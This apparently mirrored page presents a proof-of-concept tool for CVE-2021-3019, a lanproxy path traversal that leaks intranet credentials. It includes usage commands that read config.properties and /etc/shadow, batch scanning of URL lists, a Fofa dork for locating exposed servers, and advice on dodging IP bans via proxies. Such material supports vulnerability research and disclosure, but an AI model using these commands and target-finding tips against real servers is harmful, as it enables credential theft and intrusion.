CVE-2021-3019 PoC — Ffay Lanproxy 路径遍历漏洞

Source

https://github.com/0xf4n9x/CVE-2021-3019

Associated Vulnerability

Title:Ffay Lanproxy 路径遍历漏洞 (CVE-2021-3019)
Description:ffay lanproxy 0.1 allows Directory Traversal to read /../conf/config.properties to obtain credentials for a connection to the intranet.

Description

CVE-2021-3019 lanproxy目录遍历任意文件读取漏洞探测POC

Readme

# CVE-2021-3019
CVE-2021-3019 lanproxy目录遍历任意文件读取漏洞

![payload](./imgs/payload.png)

## 使用方法

### 下载

```zsh
git clone https://github.com/FanqXu/CVE-2021-3019.git
cd CVE-2021-3019
```

### 帮助

默认不带参数运行显示帮助信息

![help](./imgs/help.png)

### 单个URL

对单个URL进行漏洞检测，如果存在漏洞则默认读取配置文件并输出

```zsh
python3 POC.py -u http://127.0.0.1:9100
```

![singeUrl](./imgs/singeUrl.png)

### 读取其他文件

使用`-r`参数读取系统其他文件，需要知道文件的绝对路径

```zsh
python3 POC.py -u http://127.0.0.1:9100 -r /etc/shadow
```

![readOtherFile](./imgs/readOtherFile.png)

### 批量扫描

使用`-f`参数批量检测，有漏洞的将被写入`success.txt`文件

```zsh
python3 POC.py -f urls.txt
```

![files](./imgs/files.png)

## 其他问题

### Fofa Dork

"Server: LPS-0.1" && title=="登录"

### IP被禁

当出现 `Connection reset by peer` 时，极大可能是被目标服务器禁了IP，切换个代理IP即可。

### 注意蜜罐

File Snapshot

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!